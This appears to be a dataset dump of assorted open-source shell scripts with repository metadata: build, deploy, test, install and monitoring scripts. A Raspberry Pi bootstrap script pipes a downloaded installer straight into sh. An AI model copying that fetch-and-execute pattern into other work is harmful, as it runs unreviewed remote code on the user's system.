# ~/.docker/machine/machines, refusing to clobber an existing default.
# NOTE(review): user-facing typos ("does not exists", "manchine") and the
# odd 'eval $(rm ...)' / 'eval $(ln ...)' wrappers (the commands print
# nothing, so eval is a no-op) are left as-is - runtime behavior unchanged.
function dkmd {
  if (( ! $+commands[docker-machine] )); then
    return 1
  fi
  pushd ~/.docker/machine/machines
  if [[ ! -d $1 ]]; then
    echo "Docker machine '$1' does not exists. Abort."
    popd
    return 1
  fi
  if [[ -L default ]]; then
    eval $(rm -f default)
  elif [[ -d default ]]; then
    echo "A default manchine already exists. Abort."
    popd
    return 1
  elif [[ -e default ]]; then
    echo "A file named 'default' already exists. Abort."
    popd
    return 1
  fi
  eval $(ln -s $1 default)
  popd
}
# Source plugin files
source "${0:h}/alias.zsh"
| true
|
a819e7cb1d9d827337850bd30f16a021fed62796
|
Shell
|
geoladris/core
|
/build-tools/publish-js-dev.sh
|
UTF-8
| 536
| 3.234375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Publish a dev (alpha) build of the JS package under the npm 'dev' tag.
# The base X.Y.Z version comes from pom.xml; package.json tracks X.Y.Z-alpha.N.
pomVersion=`grep -oPm1 "(?<=<version>)[^<]+" pom.xml | grep -oE '[0-9]+\.[0-9]+\.[0-9]+'`
packageVersion=`jq -r .version package.json`
# If package.json already carries an alpha of this pom version, bump the
# alpha counter; otherwise start a fresh X.Y.Z-alpha.0 series.
# NOTE(review): the dots in $pomVersion are unescaped inside the =~ regex,
# so they match any character - harmless for version strings, but confirm.
if [[ $packageVersion =~ $pomVersion-alpha\.[0-9]+$ ]]; then
v="${packageVersion%.*}.$((${packageVersion##*.}+1))"
else
v="`echo $pomVersion | grep -oE '[0-9]+\.[0-9]+\.[0-9]+'`-alpha.0"
fi
yarn publish --new-version $v --no-git-tag-version --tag dev
# Commit the version bump only when yarn actually modified package.json
if [ "`git status -s package.json | wc -l`" -gt 0 ]; then
git add package.json
git commit -m "Bump package.json version to $v"
fi
|
c663ce30704479e175ce3d3c77d348cf8d3b6825
|
Shell
|
openeuler-mirror/A-Tune
|
/tests/test_atune-adm_check.sh
|
UTF-8
| 1,425
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/sh
# Copyright (c) 2019 Huawei Technologies Co., Ltd.
#
# A-Tune is licensed under the Mulan PSL v2.
# You can use this software according to the terms and conditions of the Mulan PSL v2.
# You may obtain a copy of Mulan PSL v2 at:
# http://license.coscl.org.cn/MulanPSL2
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v2 for more details.
# Create: 2020-01-09
# Author: zhangtaibo <sonice1755@163.com>
# Functional test for `atune-adm check`. tst_resm/tst_exit/check_result/
# check_service_started come from test_lib.sh; check_result presumably sets
# EXIT_FLAG on mismatch - confirm in test_lib.sh.
export TCID="atune-adm check cmd test"
. ./test_lib.sh
# Ensure the atuned service is running before testing
init()
{
echo "init the system"
check_service_started atuned
}
# Remove scratch output after the run
cleanup()
{
echo "===================="
echo "Clean the System"
echo "===================="
rm -rf temp.log
}
# Exercise `atune-adm check`: normal run, help text, and a bad extra argument
test01()
{
tst_resm TINFO "atune-adm check cmd test"
# Check cmd function
atune-adm check > temp.log
check_result $? 0
grep -i "Check finished" temp.log
check_result $? 0
# Help info
atune-adm check -h > temp.log
grep "check system basic information" temp.log
check_result $? 0
# Extra input
atune-adm check extra_input > temp.log
grep "Incorrect Usage." temp.log
check_result $? 0
if [ $EXIT_FLAG -ne 0 ];then
tst_resm TFAIL
else
tst_resm TPASS
fi
}
TST_CLEANUP=cleanup
init
test01
tst_exit
| true
|
583e38dbc22ea0b07117c8843018863effa82f77
|
Shell
|
oudream/ccxx
|
/3rd/hiredis/hiredis-msvc/test.sh
|
UTF-8
| 493
| 3.125
| 3
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
#!/bin/sh -ue
# Spin up a throw-away Redis server and run the hiredis test binary against
# it over both TCP (loopback) and a unix socket.
# NOTE(review): shebang options are lost when invoked as `sh test.sh`;
# a `set -ue` line inside the script would be more robust.
REDIS_SERVER=${REDIS_SERVER:-redis-server}
REDIS_PORT=${REDIS_PORT:-56379}
tmpdir=$(mktemp -d)
PID_FILE=${tmpdir}/hiredis-test-redis.pid
SOCK_FILE=${tmpdir}/hiredis-test-redis.sock
# Stop the daemonized server and remove the scratch dir on any exit path;
# set +e so cleanup continues even if the server is already gone.
cleanup() {
set +e
kill $(cat ${PID_FILE})
rm -rf ${tmpdir}
}
trap cleanup INT TERM EXIT
# Configuration is fed on stdin ('-'); the server daemonizes itself.
${REDIS_SERVER} - <<EOF
daemonize yes
pidfile ${PID_FILE}
port ${REDIS_PORT}
bind 127.0.0.1
unixsocket ${SOCK_FILE}
EOF
${TEST_PREFIX:-} ./hiredis-test -h 127.0.0.1 -p ${REDIS_PORT} -s ${SOCK_FILE}
| true
|
414c29c7e7a6394df82bad07ac4cc1bf1c81dd8e
|
Shell
|
andreasds/stocks-crawler
|
/docker/devel/database/devel-mysql-run
|
UTF-8
| 301
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
# Launch the devel-mysql container; the single argument becomes the MySQL
# root password. Exposes the classic (3306) and X-protocol (33060) ports.
if [ "$#" -ge 1 ]
then
	docker run \
		-d \
		-it \
		-e MYSQL_ROOT_PASSWORD="$1" \
		-p 3306:3306 \
		-p 33060:33060 \
		--restart unless-stopped \
		--name devel-mysql \
		devel-mysql:1.0
else
	# Usage errors go to stderr and yield a non-zero exit status so
	# callers can detect the failure (previously it exited 0).
	echo "ERROR: no argument detected" >&2
	echo "./devel-run <mysql_password>" >&2
	exit 1
fi
| true
|
8bec6c1fec13da78b6d802023eb9cb4ee25d9edf
|
Shell
|
great-expectations/great_expectations
|
/ci/checks/check_repo_root_size.sh
|
UTF-8
| 518
| 3.8125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Guard against accidental clutter in the repository root: fail whenever the
# number of entries differs from the expected count.
# If you legitimately add or remove a root item, update expected_items below,
# but prefer finding a more appropriate location for new files first.
expected_items=41
actual_items=$(ls -la | wc -l)
echo "Items found in repo root:"
ls -la
if [ "$actual_items" -ne "$expected_items" ]; then
  echo "There should be ${expected_items} items in the repo root, you have ${actual_items}"
  exit 1
fi
| true
|
67a31c13f8a9b6458924f359719f1807ea94d350
|
Shell
|
rsenn/scripts
|
/sh/functions/sf-get-cvs-modules.sh
|
UTF-8
| 954
| 3.453125
| 3
|
[] |
no_license
|
# Enumerate the CVS modules of one or more SourceForge projects (one project
# name per argument) and print the shell commands (cvspass entry + cvs co)
# needed to mirror each module. Heavy metaprogramming: command lines are
# assembled as strings and eval'd; set DEBUG=true to dump each one to stderr.
sf-get-cvs-modules() {
(CVSCMD="cvs -z3 -d:pserver:anonymous@\$ARG.cvs.sourceforge.net:/cvsroot/\$ARG co"
# CVSPASS="cvs -d:pserver:anonymous@\$ARG.cvs.sourceforge.net:/cvsroot/\$ARG login"
CVSPASS='echo "${GREP-grep} -q @$ARG.cvs.sourceforge.net ~/.cvspass 2>/dev/null || cat <<\\EOF >>~/.cvspass
\1 :pserver:anonymous@$ARG.cvs.sourceforge.net:2401/cvsroot/$ARG A
EOF"'
for ARG; do
# Scrape the module list (top-level directories) from the ViewVC index page
CMD="curl -s http://$ARG.cvs.sourceforge.net/viewvc/$ARG/ | ${SED-sed} -n \"s|^\\([^<>/]\+\\)/</a>\$|\\1|p\""
(set -- $(eval "$CMD")
# Multi-module projects get one destination sub-directory per module
test $# -gt 1 && DSTDIR="${ARG}-cvs/\${MODULE}" || DSTDIR="${ARG}-cvs"
CMD="${CVSCMD} -d ${DSTDIR} -P \${MODULE}"
#[ -n "$DSTDIR" ] && CMD="(cd ${DSTDIR%/} && $CMD)"
CMD="echo \"$CMD\""
CMD="for MODULE; do $CMD; done"
[ -n "$DSTDIR" ] && CMD="echo \"mkdir -p ${DSTDIR%/}\"; $CMD"
[ -n "$CVSPASS" ] && CMD="$CVSPASS; $CMD"
[ "$DEBUG" = true ] && echo "CMD: $CMD" 1>&2
eval "$CMD")
done)
}
| true
|
18d69867518c8a8f4aa4b234717b82d43d20f923
|
Shell
|
wildfly/wildfly-s2i
|
/test/test-app-extension2/extensions/install.sh
|
UTF-8
| 164
| 2.8125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# S2I extension hook: copy extra JBoss modules from the injected artifacts
# directory ($1) into the server installation at $JBOSS_HOME.
set -x
echo "Running $PWD/install.sh"
injected_dir=$1
# copy any needed files into the target build.
# Both expansions are quoted so paths containing spaces survive word splitting.
cp -rf "${injected_dir}/modules" "$JBOSS_HOME"
| true
|
78cd276e1070143eaec135ccddd3f2bd18d8a9bc
|
Shell
|
ws1/scripty
|
/src/utility/jpg-resize
|
UTF-8
| 130
| 2.625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# Resizes JPG images in current directory.
for i in *.jpg
do
  # Skip the literal '*.jpg' pattern when the directory has no matches;
  # previously convert was invoked on the non-existent file and errored.
  [ -e "$i" ] || continue
  # NOTE(review): '>' truncates the log on every iteration, so only the
  # last file's output survives; kept as-is to preserve behavior.
  convert "$i" -resize 250 "$i" > /tmp/jpg-resize.log
done
| true
|
9d05fb9789cecee63706b6b4ab3074ae536baf24
|
Shell
|
pruje/deb-builder
|
/build.sh
|
UTF-8
| 5,876
| 4.09375
| 4
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
#
# Build script for debian package
#
# MIT License
# Copyright (c) 2019 Jean Prunneaux
#
# go into current directory (the script's own directory, so relative
# paths like src/ and debconf/ resolve regardless of the caller's cwd)
cd "$(dirname "$0")"
if [ $? != 0 ] ; then
echo "ERROR: cannot go into current directory"
exit 1
fi
# save current directory path
current_directory=$(pwd)
build_directory=archives/build
# test if sources are there
if ! [ -d src ] ; then
echo "ERROR: you must put your sources in the src directory!"
exit 1
fi
#
# Functions
#
# Print help
# Usage: print_help
# Writes the usage summary for this build script to stdout.
print_help() {
	echo "Usage: $0 [OPTIONS]"
	echo "Options:"
	echo "   -v, --version VERSION  Specify a version"
	# typo fix: "confimation" -> "confirmation"
	echo "   -f, --force            Do not print confirmation before build"
	echo "   -h, --help             Print this help"
}
# Get version from latest git tag
# Usage: $(get_version)
# Must be called inside a command substitution: the function cd's into src/,
# and the subshell keeps that cd from leaking into the caller ("to keep context").
# Returns 1 when src/ is missing; prints the version without trailing newline.
get_version() {
cd src || return 1
local version
version=$(git describe --tags)
# remove 'v' (tags of the form v1.2.3)
[ "${version:0:1}" == v ] && version=${version:1}
echo -n $version
}
# Walk from the given directory up to '.', setting every path component
# to mode 755. The path must be relative to the current directory.
# NOTE(review): an absolute path never reaches '.', so dirname would loop
# on '/' forever - same as the original; callers pass relative paths.
# Usage: fix_permissions path/to/dir
fix_permissions() {
  local current=$1
  until [ "$current" = . ]; do
    chmod 755 "$current"
    current=$(dirname "$current")
  done
}
# Clean build directory
# Usage: clean_build
# Returns 0 immediately when there is nothing to clean. sudo is needed
# because the build tree is chown'd root:root before packaging.
clean_build() {
[ -d "$current_directory/$build_directory" ] || return 0
sudo rm -rf "$current_directory/$build_directory"
}
# Remove the build tree (silencing any output) and exit with the given code.
# Usage: quit EXITCODE
quit() {
	clean_build > /dev/null 2>&1
	exit $1
}
#
# Main program
#
# get options
while [ $# -gt 0 ] ; do
case $1 in
-v|--version)
if [ -z "$2" ] ; then
print_help
exit 1
fi
version=$2
shift
;;
-f|--force)
force_mode=true
;;
-h|--help)
print_help
exit
;;
*)
break
;;
esac
shift
done
# test config files
for f in build.conf package/DEBIAN/control ; do
if ! [ -f debconf/"$f" ] ; then
echo "ERROR: $f does not exists. Please verify your 'debconf' folder."
exit 1
fi
done
# load build config file
if ! source debconf/build.conf ; then
echo "There are errors inside your build.conf"
exit 1
fi
# test name
if [ -z "$name" ] ; then
echo "You must set a name for your package"
exit 1
fi
# test path
if [ -z "$path" ] ; then
echo "You must set a path where you sources are going!"
exit 1
fi
if [ -f "$current_directory"/debconf/prebuild.sh ] ; then
echo "Run prebuild..."
if ! cd src ; then
echo "... Failed to go in sources directory!"
exit 7
fi
source "$current_directory"/debconf/prebuild.sh
if [ $? != 0 ] ; then
echo "... Failed!"
exit 7
fi
# return in current directory
if ! cd "$current_directory" ; then
echo "... Failed to go in current directory!"
exit 7
fi
echo
fi
# prompt to choose version
if [ -z "$version" ] ; then
# try to get version from latest git tag
version=$(get_version 2> /dev/null)
echo -n "Choose version: "
[ -n "$version" ] && echo -n "[$version] "
read version_user
if [ -n "$version_user" ] ; then
version=$version_user
else
# no specified version: quit
[ -z "$version" ] && exit 1
fi
echo
fi
# set package name
package=$(echo "$name" | sed "s/{version}/$version/").deb
if [ "$force_mode" != true ] ; then
echo "You are about to build $package"
echo -n "Continue (y/N)? "
read confirm
[ "$confirm" != y ] && exit
fi
# clean and copy package files
echo
echo "Clean & prepare build environment..."
mkdir -p archives && clean_build && \
cp -rp debconf/package "$build_directory"
if [ $? != 0 ] ; then
echo "... Failed! Please check your access rights."
exit 3
fi
echo "Set version number..."
sed -i "s/^Version: .*$/Version: $version/" "$build_directory"/DEBIAN/control
if [ $? != 0 ] ; then
echo "... Failed! Please check your access rights."
quit 4
fi
echo "Copy sources..."
install_path=$build_directory/$path
mkdir -p "$(dirname "$install_path")" && \
cp -rp src "$install_path"
if [ $? != 0 ] ; then
echo "... Failed! Please check your access rights."
quit 5
fi
echo "Clean unnecessary files..."
if ! cd "$install_path" ; then
echo "... Failed to go inside path directory!"
quit 6
fi
for f in "${clean[@]}" ; do
if [ "${f:0:1}" == '/' ] ; then
files=(".$f")
else
files=($(find . -name "$f"))
fi
if [ ${#files[@]} -gt 0 ] ; then
echo "Delete ${files[@]}..."
if ! rm -rf "${files[@]}" ; then
echo '... Failed!'
quit 6
fi
fi
done
echo
echo "Set root privileges..."
# go into build directory
cd "$current_directory/$build_directory"
if [ $? != 0 ] ; then
echo "... Failed to go into build directory!"
quit 8
fi
# fix directories permissions & set root privileges
fix_permissions ".$path" && sudo chown -R root:root .
if [ $? != 0 ] ; then
echo "... Failed!"
quit 8
fi
# postbuild
if [ -f "$current_directory"/debconf/postbuild.sh ] ; then
echo
echo "Run postbuild..."
source "$current_directory"/debconf/postbuild.sh
if [ $? != 0 ] ; then
echo "... Failed!"
quit 9
fi
fi
echo
echo "Generate deb package..."
# go into archives directory
cd "$current_directory"/archives
if [ $? != 0 ] ; then
echo "... Failed to go into archives directory!"
quit 10
fi
# generate deb file + give ownership to current user
sudo dpkg-deb --build build "$package" && \
sudo chown "$(whoami)" "$package"
if [ $? != 0 ] ; then
echo "... Failed!"
quit 10
fi
echo
echo "Create version directory..."
# create package version directory
mkdir -p "$version" && mv "$package" "$version"
if [ $? != 0 ] ; then
echo "... Failed!"
quit 11
fi
echo "Clean files..."
clean_build
echo
echo "Generate checksum..."
if cd "$version" ; then
# generate checksum
cs=$(shasum -a 256 "$package")
if [ -n "$cs" ] ; then
# write checksum in file
echo "$cs" > sha256sum.txt
if [ $? != 0 ] ; then
echo "... Failed to write inside checksum file!"
fi
else
echo "... Failed to generate checksum!"
fi
else
echo "... Failed to go into version directory!"
fi
echo
echo "Package is ready!"
| true
|
f1ec64c0c43bae36f1cb7c47bde6b87b238c1bed
|
Shell
|
stden/bash
|
/p2/cycle.sh
|
UTF-8
| 233
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/bash
# Multiply two random numbers in an infinite loop (a simple CPU-load generator).
# NOTE: $[ ... ] is obsolete bash arithmetic syntax; $(( ... )) is the modern form.
while :
do
i=$[$RANDOM*$RANDOM]
# echo $i # Uncomment to print each product to the console
done
| true
|
46218f92b12179960294eeffcd1c76a7e048ddb7
|
Shell
|
tjtolon/dotfiles
|
/install/install_franz.sh
|
UTF-8
| 602
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/bash
# Install the Franz messaging app from its latest GitHub release .deb,
# unless the `franz` command is already present.
# ('>>' appends to /dev/null - works, though '>' is the conventional form.)
if command -v franz >> /dev/null; then
echo "command already exists"
else
sudo apt install -y gconf2 gconf-service libappindicator1
sudo apt install -y jq
# parse_latest_deb_url REPO OUTVAR
# Queries the GitHub releases API for REPO and stores the (still quoted)
# browser_download_url of the .deb asset into the variable named OUTVAR.
function parse_latest_deb_url() {
curl_result=$(curl --silent "https://api.github.com/repos/$1/releases/latest")
only_deb=$(echo $curl_result | jq '.assets[]|.browser_download_url'|grep ".*deb\"")
# eval assigns to the caller-supplied variable name
eval "$2=$only_deb"
}
dl_url=''
parse_latest_deb_url meetfranz/franz dl_url
echo $dl_url
wget $dl_url
# strip everything up to the last '/' to get the bare filename
filename=${dl_url##*/}
sudo dpkg -i $filename
rm $filename
fi
| true
|
ae5c883f4e4e6d0bd5fb0711d9bdf078ea5baf09
|
Shell
|
RobBrazier/entitydecode.com
|
/.semaphore/deploy.sh
|
UTF-8
| 580
| 3.359375
| 3
|
[] |
no_license
|
#!/bin/bash
# Mirror the generated site in ./public to BunnyCDN storage over FTP,
# then delete remote files that no longer exist locally.
# NOTE(review): `set -x` traces every command, so the credential-bearing
# $ftp_url is echoed into the CI log - consider masking or dropping -x.
set -exo pipefail
ftp_url="ftp://$BUNNYCDN_USERNAME:$BUNNYCDN_PASSWORD@storage.bunnycdn.com"
cd public
ftp_options="--reverse --no-perms --transfer-all --overwrite"
# Dry-run with --delete to discover which remote paths would be removed
lftp "$ftp_url" -e "mirror --dry-run $ftp_options --delete; bye" > ../to-delete.txt
to_delete=$(grep rm ../to-delete.txt | awk -F"$BUNNYCDN_USERNAME/" '{ print $2 }' || true)
# Upload everything first
lftp "$ftp_url" -e "mirror $ftp_options --verbose; bye"
# Then issue one batched 'rm -r' command list for the stale remote paths
lftp_command=""
for f in $to_delete; do
lftp_command="rm -r $f; $lftp_command"
done
if [ -n "$lftp_command" ]; then
lftp "$ftp_url" -e "$lftp_command bye"
fi
| true
|
761b247bde8e4f64c8fb5286f9efef9829bbf4c7
|
Shell
|
Hermitter/dotfiles
|
/config/sway/scripts/start_on_boot.sh
|
UTF-8
| 551
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/bash
# Starts apps with the specified commands and avoids starting if already running.
# Each argument has the form "name:command"; the app name should match the
# process name (it is matched with pgrep -x).
for pair in "$@"; do
  # Split on the FIRST ':' only, using parameter expansion. This fixes two
  # defects of the old `IFS=:; set -- $pair` approach: IFS stayed modified
  # for the rest of the script, and any command containing a ':' of its own
  # was truncated at the second field.
  NAME=${pair%%:*}
  CMD=${pair#*:}
  if pgrep -x "$NAME" > /dev/null
  then
    echo "Not starting '$NAME'. App already running"
  else
    eval "$CMD" &
  fi
done
# Kill each child process. The disown command was not used because an empty process was
# left behind for each app that was disowned.
pkill -P $$
| true
|
8e354a11a796e9fcf341c380e4c0f7d3c21fb231
|
Shell
|
michaeldallen/raspbian_bootstrap
|
/v2/io.mdabone.device.bootstrap.onboard.52-docker.bash
|
UTF-8
| 508
| 2.84375
| 3
|
[] |
no_license
|
# see: https://gist.github.com/alexellis/fdbc90de7691a1b9edb545c17da2d975
# Install Docker on a Raspberry Pi (skipped when docker already exists),
# disable swap, and enable the cgroup flags container workloads need.
if which docker ; then
echo no action taken
else
curl -sSL get.docker.com | sh
usermod pi -aG docker
# Permanently disable the dphys swapfile - presumably for container/k8s
# workloads on the Pi; confirm before reusing this elsewhere.
dphys-swapfile swapoff
dphys-swapfile uninstall
update-rc.d dphys-swapfile remove
# Append the cgroup kernel flags once; they take effect after a reboot
if ! grep --silent 'cgroup_enable=cpuset cgroup_memory=1' /boot/cmdline.txt ; then
sed -i 's/$/ cgroup_enable=cpuset cgroup_memory=1/' /boot/cmdline.txt
echo update /boot/cmdline.txt
fi
fi
| true
|
aa238e621e1b2e0db0d379ccd1152352c4d46c36
|
Shell
|
aritama/sisop-2012-2c
|
/SHIELD/modulos/periodicos/limitaciones/modulo_limitaciones.sh
|
UTF-8
| 4,294
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
# SHIELD periodic module: per-terminal resource limitation checks.
# iniciar: export the default limits (optionally overridden by the user's
# config file) and take a baseline measurement of current consumption.
# Results are stored in the global consumo* variables.
function iniciar
{
export MAX_CPU=50
export MAX_MEM=75
export MAX_PROCS=10
export MAX_SOCKS=3
export MAX_ARCHS=4
# User overrides: the config file is sourced via eval and may redefine MAX_*
local limitacionesInit="$(cat ~/.shield/MODULES_CONFIG/limitaciones.config)"
eval "${limitacionesInit}"
### Aggregate %CPU over this terminal's processes (bc handles the decimals)
local listaConsumoCPU=$(ps h u t | awk '{print $3}')
consumoCPU=0
for consumo in $listaConsumoCPU
do
consumoCPU=$(echo "${consumoCPU} + ${consumo}" | bc -l)
done
### Aggregate %MEM the same way
local listaConsumoMEM=$(ps h u t | awk '{print $4}')
consumoMEM=0
for consumo in $listaConsumoMEM
do
consumoMEM=$(echo "${consumoMEM} + ${consumo}" | bc -l)
done
### Process count for this terminal
consumoPROCS=$(($(ps h u t | wc -l) - 5)) ## not counting the processes of 1)login,2)bash,3)ps, 4)wc,5)assignment,,nor those already present
### Count TCP sockets (non-localhost) owned by this terminal's PIDs
local listaPIDS=$(ps h u t | awk '{print $2}' | uniq)
local listaSocketsPids=$(lsof -i4 | grep TCP | grep -v "localhost" | awk '{print $2}' | uniq)
consumoSOCKS=0
for limitPid in $listaPIDS
do
for limitPid2 in $listaSocketsPids
do
if [ $limitPid -eq $limitPid2 ]
then
consumoSOCKS=$(($consumoSOCKS + 1))
fi
done
done
### Count open file descriptors of processes on this tty, excluding
### fds 0,1,2,3 and 255 (stdio / bash internals).
# NOTE(review): the grep -v chain also drops any fd whose number merely
# contains the digits 0-3 (e.g. fd 10) - verify this filtering is intended.
local mytty=`tty`
consumoARCHS=0
local listTtyPids=$(lsof $mytty | awk '{print $2}' | uniq)
for pid in $listTtyPids
do
auxConsArchs="$(ls "/proc/${pid}/fd" 2> /dev/null | tr "$IFS" '\n')"
auxConsArchs="$(echo "${auxConsArchs}" | grep -v 0 | grep -v 1 | grep -v 2 | grep -v 3 | grep -v 255)"
if [ "$auxConsArchs" == "" ]
then
auxConsArchs=0
else
auxConsArchs=$(echo "${auxConsArchs}" | wc -l)
fi
consumoARCHS=$(($consumoARCHS + ${auxConsArchs}))
done
return 0
}
# Tear down the limit environment exported by iniciar.
# Always returns 0.
detener()
{
  local limit
  for limit in MAX_CPU MAX_MEM MAX_PROCS MAX_SOCKS MAX_ARCHS; do
    unset "$limit"
  done
  return 0
}
# Re-measure consumption and compare it against the MAX_* limits.
# Returns 1 as soon as any limit is exceeded, 0 when everything is within
# bounds. Largely duplicates the measurement pipelines of iniciar.
function procesar
{
### %CPU total for this terminal
local listaConsumoCPU=$(ps h u t | awk '{print $3}')
consumoCPU=0
for consumo in $listaConsumoCPU
do
consumoCPU=$(echo "${consumoCPU} + ${consumo}" | bc -l)
done
if [ $(echo "${consumoCPU} > ${MAX_CPU}" | bc -l) -eq 1 ]
then
return 1
fi
### %MEM total for this terminal
local listaConsumoMEM=$(ps h u t | awk '{print $4}')
consumoMEM=0
for consumo in $listaConsumoMEM
do
consumoMEM=$(echo "${consumoMEM} + ${consumo}" | bc -l)
done
if [ $(echo "${consumoMEM} > ${MAX_MEM}" | bc -l) -eq 1 ]
then
return 1
fi
### Process count.
# NOTE(review): subtracts 9 here while iniciar subtracts 5, yet the comment
# lists only 5 helper processes - verify which offset is correct.
consumoPROCS=$(($(ps h u t | wc -l) - 9)) ## not counting the processes of 1)login,2)bash,3)ps, 4)wc,5)assignment,,nor those already present
if [ $(echo "${consumoPROCS} > ${MAX_PROCS}" | bc -l) -eq 1 ]
then
return 1
fi
### Non-localhost TCP sockets owned by this terminal's PIDs
local listaPIDS=$(ps h u t | awk '{print $2}' | uniq)
local listaSocketsPids=$(lsof -i4 | grep TCP | grep -v "localhost" | awk '{print $2}' | uniq)
consumoSOCKS=0
for limitPid in $listaPIDS
do
for limitPid2 in $listaSocketsPids
do
if [ $limitPid -eq $limitPid2 ]
then
consumoSOCKS=$(($consumoSOCKS + 1))
fi
done
done
if [ $consumoSOCKS -gt $MAX_SOCKS ]
then
return 1
fi
### Open file descriptors of processes on this tty (excluding fds 0-3, 255)
local mytty=`tty`
consumoARCHS=0
local listTtyPids=$(lsof $mytty | awk '{print $2}' | uniq)
for pid in $listTtyPids
do
auxConsArchs="$(ls "/proc/${pid}/fd" 2> /dev/null | tr "$IFS" '\n')"
auxConsArchs="$(echo "${auxConsArchs}" | grep -v 0 | grep -v 1 | grep -v 2 | grep -v 3 | grep -v 255)"
if [ "$auxConsArchs" == "" ]
then
auxConsArchs=0
else
auxConsArchs=$(echo "${auxConsArchs}" | wc -l)
fi
consumoARCHS=$(($consumoARCHS + ${auxConsArchs}))
done
#consumoARCHS=$(($(lsof $mytty | awk '{print $2}' | uniq | wc -l) - 11)) # minus lsof,awk,uniq,wc,assignment,bash
if [ $consumoARCHS -gt $MAX_ARCHS ]
then
return 1
fi
return 0
}
# Report each configured limit next to the value last measured by
# procesar, framed by blank lines.  Always succeeds.
function informacion
{
  printf '\nMAX_CPU: %s ; consumoCPU: %s\n' "${MAX_CPU}" "${consumoCPU}"
  printf 'MAX_MEM: %s ; consumoMEM: %s\n' "${MAX_MEM}" "${consumoMEM}"
  printf 'MAX_SOCKS: %s ; consumoSOCKS: %s\n' "${MAX_SOCKS}" "${consumoSOCKS}"
  printf 'MAX_PROCS: %s ; consumoPROCS: %s\n' "${MAX_PROCS}" "${consumoPROCS}"
  printf 'MAX_ARCHS: %s ; consumoARCHS: %s\n\n' "${MAX_ARCHS}" "${consumoARCHS}"
  return 0
}
case "$1" in
"iniciar")
iniciar
;;
"detener")
detener
;;
"procesar")
procesar
;;
"informacion")
informacion
;;
esac
| true
|
5094aaf88cd4de504e2cc6730cf3704e5330f515
|
Shell
|
justinbloomfield/crux-ports
|
/drist/Pkgfile
|
UTF-8
| 567
| 2.875
| 3
|
[] |
no_license
|
# Description: Tool to configure and sync configurations to servers
# URL: git://bitreich.org/drist
# Maintainer: poq <jbloomfield at live dot com>
# Depends on:
name=drist
version=git-c4d5a55
# Commit pinned by this port; source=() is empty because the code is
# fetched via git inside build().
sversion=c4d5a55
release=1
source=()
gitsource=git://bitreich.org/drist

# Clone (or update) the drist repository in the pkgmk source cache,
# check out the pinned commit and install into the staging dir $PKG.
build() {
    # Abort if the source cache dir is missing; otherwise the clone
    # would silently land in whatever the current directory is.
    cd "$PKGMK_SOURCE_DIR" || exit 1
    if cd "$name"; then
        # Existing checkout: discard local changes, then update.
        git reset --hard
        git pull "$gitsource"
    else
        git clone "$gitsource" "$name"
        cd "$name" || exit 1
    fi
    git checkout "$sversion"
    make DESTDIR="$PKG" PREFIX=/usr MANPREFIX=/usr/man install
}
# vim: set ft=sh ts=4 et:
| true
|
92855210753ccf6fea8a6b33fe92dec9b9318efe
|
Shell
|
clz1/data_consistent_test
|
/rbdmirror_failure/check.sh
|
UTF-8
| 1,285
| 3.6875
| 4
|
[] |
no_license
|
#!/bin/sh
# Compare a primary RBD device against its rbd-mirror passive replica,
# 4K block by 4K block.  The passive image may legitimately trail the
# primary: once the first all-zero (not-yet-replicated) block appears,
# every subsequent block must also be zero.
#
# Usage: check.sh <primary-dev> <passive-dev>
# Requires a 4096-byte zero reference file `4K_zero` in the CWD.
#
# Fixes vs. previous version: `==` inside `[ ]` is a bashism that
# errors under dash (`#!/bin/sh`); expansions are now quoted and
# backticks replaced with $( ).
DEV_primary=$1
DEV_passive=$2
zero_md5=$(md5sum 4K_zero | awk '{print $1}')
first_zero=0
count=0
while true; do
    rm -rf read_4K_primary
    rm -rf read_4K_passive
    dd if="${DEV_primary}" of=read_4K_primary bs=4K count=1 skip=$count >/dev/null 2>&1
    dd if="${DEV_passive}" of=read_4K_passive bs=4K count=1 skip=$count >/dev/null 2>&1
    read_passive_size=$(ls -l read_4K_passive | awk '{print $5}')
    # A zero-byte read means we ran off the end of the image: done.
    if [ "${read_passive_size}" = 0 ]; then
        echo "Success: read 0 bytes. check finished at block count: $count"
        exit 0
    fi
    read_primary_md5=$(md5sum read_4K_primary | awk '{print $1}')
    read_passive_md5=$(md5sum read_4K_passive | awk '{print $1}')
    if [ "${read_passive_md5}" != "${zero_md5}" ]; then
        # Non-zero data after the first zero block violates the
        # "replicated prefix, zero suffix" invariant.
        if [ "${first_zero}" = 1 ]; then
            echo "Not zero data, but first zero is already found. at block count: ${count}"
            exit 1
        fi
        # Replicated data must match the primary exactly.
        if [ "${read_passive_md5}" != "${read_primary_md5}" ]; then
            echo "Found data is not equal with expected: at block count ${count}"
            exit 1
        fi
        echo "Found data is equal with read_primary_md5: at block count ${count}"
    else
        if [ "${first_zero}" = 0 ]; then
            echo "Found first zero block: at block count ${count}"
            first_zero=1
        fi
        echo "Found zero block and first zero block has been ok: at block count ${count}"
    fi
    count=$((count + 1))
done
| true
|
7a4b7ecff4387b1eb3cee2e99c5400537cb79bb4
|
Shell
|
andreashdez/dotfiles
|
/.local/bin/notify_battery.sh
|
UTF-8
| 258
| 2.65625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Script used by systemd timer unit to notify low battery charge.
# While discharging below 15%, acpi's percentage/time fields are passed
# through to a critical desktop notification; with no matching output,
# xargs -r suppresses the notification entirely.
acpi --battery \
| awk '/Discharging/ && int($4) < 15 { print $4, $5, $6 }' \
| xargs -ri notify-send --urgency=critical "WARNING: Low battery" "Battery is at {}"
| true
